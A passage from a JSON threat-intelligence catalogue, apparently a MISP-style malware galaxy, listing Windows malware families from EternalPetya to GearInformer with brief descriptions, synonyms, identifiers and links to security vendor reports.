"https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", "https://www.riskiq.com/blog/labs/badrabbit/", "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", "https://securelist.com/bad-rabbit-ransomware/82851/" ], "synonyms": [ "BadRabbit", "Diskcoder.C", "ExPetr", "NonPetya", "NotPetya", "Nyetya", "Petna", "Pnyetya", "nPetya" ], "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", "value": "EternalPetya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" ], "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", "value": "EtumBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", "value": "Evilbunny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" ], "synonyms": [ "Vidgrab" ], "type": [] }, "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" ], "synonyms": [], "type": [] }, "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93", "value": "EVILNUM (Windows)" }, { "description": "Privately modded version of the Pony stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" ], "synonyms": [ "CREstealer" ], "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", "value": "EvilPony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" ], "synonyms": [], "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", "value": "Evrial" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" ], "synonyms": [ "Saber", "Sabresac" ], "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", "value": "Excalibur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, { "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat", "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" ], "synonyms": [], "type": [] }, "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", "value": "Exile RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" ], "synonyms": [ "ExtRat" ], "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", "value": "Xtreme RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], "type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", "value": "Eye Pyramid" }, { "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://github.com/360netlab/DGA/issues/36", "http://www.freebuf.com/column/153424.html" ], "synonyms": [ "WillExec" ], "type": [] }, "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", "value": "FakeDGA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" ], "synonyms": [ "Braviax" ], "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", "value": "FakeRean" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" ], "synonyms": [], "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", "value": "FakeTC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" ], "synonyms": [], "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" ], "synonyms": [], "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/" ], "synonyms": [], "type": [] }, "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602", "value": "Farseer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", "value": "Felismus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", "value": "Felixroot" }, { "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" ], "synonyms": [ "Bugat", "Cridex" ], "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", "value": "Feodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" ], "synonyms": [], "type": [] }, "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", "value": "FF RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" ], "synonyms": [], "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", "value": "FileIce" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/" ], "synonyms": [], "type": [] }, "uuid": "87467366-679d-425c-8bea-b9f77c543252", "value": "Final1stSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], "synonyms": [ "Poseidon" ], "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", "value": "FindPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" ], "synonyms": [ "FinSpy" ], "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", "value": "FinFisher RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" ], "synonyms": [], "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" ], "synonyms": [], "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", "value": "FireCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", "value": "FireMalv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" ], "synonyms": [], "type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" ], "synonyms": [], "type": [] }, "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", "value": "Flame" }, { "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118", "value": "FLASHFLOOD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, { "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" ], "synonyms": [], "type": [] }, "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", "value": "FlawedGrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "2431a1e5-4e64-454a-94c8-8a95f88d2d4a", "value": "FlexiSpy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" ], "synonyms": [], "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] }, "uuid": "0024c2d9-673f-4999-b240-4ae61a72c9b9", "value": "FlowerShop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" ], "synonyms": [], "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", "value": "Floxif" }, { "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" ], "synonyms": [], "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", "value": "Flusihoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" ], "synonyms": [], "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", "value": "Formbook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" ], "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", "value": "FormerFirstRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", "value": "Freenki Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ "BitPaymer" ], "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "https://sentinelone.com/blogs/sfg-furtims-parent/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" ], "synonyms": [], "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", "value": "Furtim" }, { "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" ], "synonyms": [], "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", "value": "GalaxyLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" ], "synonyms": [ "pios" ], "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", "value": "gamapos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" ], "synonyms": [], "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", "value": "Gameover DGA" }, { "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.wired.com/?p=2171700", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" ], "synonyms": [ "GOZ", "ZeuS P2P" ], "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", "value": "Gameover P2P" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" ], "synonyms": [], "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", "value": "Gamotrol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "http://asec.ahnlab.com/1145", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" ], "synonyms": [ "GrandCrab" ], "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" ], "synonyms": [], "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", "value": "Gaudox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" ], "synonyms": [], "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", "value": "Gauss" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://securelist.com/introducing-whitebear/81638/", "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://github.com/eset/malware-ioc/tree/master/turla", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "WhiteBear" ], "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" ], "synonyms": [], "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", "value": "gcman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://www.rekings.com/ispy-customers/", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" ], "synonyms": [], "type": [] }, "uuid": 